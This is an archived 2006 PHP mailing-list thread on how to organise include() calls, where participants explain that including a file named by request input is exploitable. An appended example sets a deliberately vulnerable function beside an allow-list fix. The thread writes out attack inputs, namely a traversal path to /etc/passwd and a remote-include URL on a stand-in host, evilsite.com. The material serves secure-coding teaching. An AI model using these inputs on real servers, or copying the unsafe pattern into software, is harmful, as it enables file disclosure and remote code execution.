Re: [PHP] Seeking recommendations for use of include()

2006-06-15 Thread Larry Garfield
On Wednesday 14 June 2006 21:48, Dave M G wrote: Jochem, ::index.php <?php include $_GET['page']; ?> Wouldn't strip_tags() eliminate the <?php ?> tags that make this possible? No, because that's not what the hole is. YOUR CODE is include $_GET['page']. That's an easily exploitable

Re: [PHP] Seeking recommendations for use of include()

2006-06-15 Thread Richard Lynch
On Tue, June 13, 2006 9:17 pm, Dave M G wrote: Richard Lynch wrote: The problem with making it dynamic, is that you've just made it AWFULLY easy for some Bad Guy to inject their own PHP file into your system... Think about that for awhile. I have thought about it, and I can only see it as

Re: [PHP] Seeking recommendations for use of include()

2006-06-15 Thread Richard Lynch
No. He's saying YOUR code is, more or less, not unlike: <?php include $_GET['page']; ?> Maybe it's more like this: <?php include $page; ?> Well, if at some point, you forget to initialize $page, AND IF you have register_globals on, for some reason, perhaps even because you later install some

Re: [PHP] Seeking recommendations for use of include()

2006-06-14 Thread Dave M G
Larry, Thank you for responding. $untrusted_var = '../../../../../../../etc/passwd'; include($untrusted_var); Or in later versions of PHP, I *think* the following may even work: $untrusted_var = 'http://evilsite.com/pub/evil.php'; include($untrusted_var); I'm still not sure I see the

Re: [PHP] Seeking recommendations for use of include()

2006-06-14 Thread Jochem Maas
Dave M G wrote: Larry, Thank you for responding. $untrusted_var = '../../../../../../../etc/passwd'; include($untrusted_var); Or in later versions of PHP, I *think* the following may even work: $untrusted_var = 'http://evilsite.com/pub/evil.php'; include($untrusted_var); I'm still

Re: [PHP] Seeking recommendations for use of include()

2006-06-14 Thread Dave M G
Jochem, ::index.php <?php include $_GET['page']; ?> Wouldn't strip_tags() eliminate the <?php ?> tags that make this possible? -- Dave M G -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Seeking recommendations for use of include()

2006-06-13 Thread Dave M G
PHP List, Up until now, in order to get all the functions and classes I need in my scripts, I have always made a file called includes.php that contains a series of include() statements for all of the files that I want to include. Then I just include that one file at the top of all my PHP

Re: [PHP] Seeking recommendations for use of include()

2006-06-13 Thread tedd
At 7:22 PM +0900 6/13/06, Dave M G wrote: PHP List, Up until now, in order to get all the functions and classes I need in my scripts, I have always made a file called includes.php that contains a series of include() statements for all of the files that I want to include. Then I just include

Re: [PHP] Seeking recommendations for use of include()

2006-06-13 Thread Andrei
Anyway, when you include files by script (not specifying the order in which you include them), check out class inheritance and class usage in the files you include. Classes that are inherited must be included first. Andy At 7:22 PM +0900 6/13/06, Dave M G wrote: PHP List, Up until now,

Re: [PHP] Seeking recommendations for use of include()

2006-06-13 Thread Richard Lynch
The problem with making it dynamic, is that you've just made it AWFULLY easy for some Bad Guy to inject their own PHP file into your system... Think about that for awhile. On Tue, June 13, 2006 5:22 am, Dave M G wrote: PHP List, Up until now, in order to get all the functions and classes I

Re: [PHP] Seeking recommendations for use of include()

2006-06-13 Thread Dave M G
Richard Lynch wrote: The problem with making it dynamic, is that you've just made it AWFULLY easy for some Bad Guy to inject their own PHP file into your system... Think about that for awhile. I have thought about it, and I can only see it as possible if the person already has the ability to

Re: [PHP] Seeking recommendations for use of include()

2006-06-13 Thread Larry Garfield
On Tuesday 13 June 2006 21:17, Dave M G wrote: If there is some other way for them to exploit a dynamic include() function, then please let me know. $untrusted_var = '../../../../../../../etc/passwd'; include($untrusted_var); Or in later versions of PHP, I *think* the following may even work:
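
The following is an added example, not code from any post in this thread. It puts the include-from-request pattern that Larry and Richard warn about next to an allow-list version in which the request only selects a key and the filename never comes from the client, adds a directory loader for the "include everything in a folder" idea from the original question, and registers an autoloader for the ordering problem Andrei raises (a parent class must be defined before a child extends it). The page names, the pages/ and lib/ directories, and every function name are assumptions made for illustration; the code uses current PHP syntax rather than the PHP 4/5.1 style of 2006.

```php
<?php
// Added example (not from the thread). Paths, page names and function names
// are hypothetical; the vulnerable function is kept deliberately vulnerable.

// VULNERABLE: whatever the client sends in ?page=... names the file PHP runs.
//   ?page=../../../../etc/passwd        -> discloses a local file
//   ?page=http://evilsite.com/evil.php  -> runs attacker code when remote
//      includes are enabled (allow_url_fopen before PHP 5.2, allow_url_include since)
function include_page_unsafe(): void
{
    include $_GET['page'];
}

// HARDENED: the request picks a key from a fixed map. Traversal sequences,
// URL wrappers and php:// streams never reach include() because the client
// cannot influence the filename, only which known key is looked up.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the page to include, or null to refuse.
function resolve_page(array $query, string $base_dir): ?string
{
    $key = $query['page'] ?? 'home';
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;                       // unknown key: refuse, do not guess
    }
    $root = realpath($base_dir);           // canonical base directory
    $path = realpath($base_dir . '/' . PAGES[$key]);
    if ($root === false || $path === false) {
        return null;                       // directory or page file missing
    }
    // Defence in depth: the resolved file must sit inside $base_dir even if
    // someone later adds a bad entry (e.g. a symlink) to the map.
    if (strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_page_safe(string $base_dir): void
{
    $path = resolve_page($_GET, $base_dir);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

// "Dynamic" loading of a library directory is fine as long as the file list
// comes from the filesystem, never from the request. Returns what was loaded.
function include_library_dir(string $dir): array
{
    $loaded = [];
    foreach (glob($dir . '/*.php') as $file) {
        include_once $file;
        $loaded[] = basename($file);
    }
    return $loaded;
}

// Andrei's ordering concern goes away with an autoloader: PHP asks for each
// class on first use, so a parent class is loaded when the child that extends
// it is compiled, whatever order the files sit in on disk. Class names come
// from code, not from the request, so this is not an injection point.
function register_autoloader(string $lib_dir): void
{
    spl_autoload_register(function (string $class) use ($lib_dir): void {
        // Namespace separators map onto subdirectories: App\Model\User -> App/Model/User.php
        $file = $lib_dir . '/' . str_replace('\\', '/', $class) . '.php';
        if (is_file($file)) {
            require $file;
        }
    });
}

// Typical front controller wiring (hypothetical directory layout):
register_autoloader(__DIR__ . '/lib');
include_page_safe(__DIR__ . '/pages');
```

Two caveats worth keeping in mind with the hardened version: the map is the security boundary, so entries must be literal filenames maintained by the developer, never built from request data; and sanitisers such as strip_tags() are irrelevant here, because the attacker's payload is the path handed to include(), not PHP tags inside the request.
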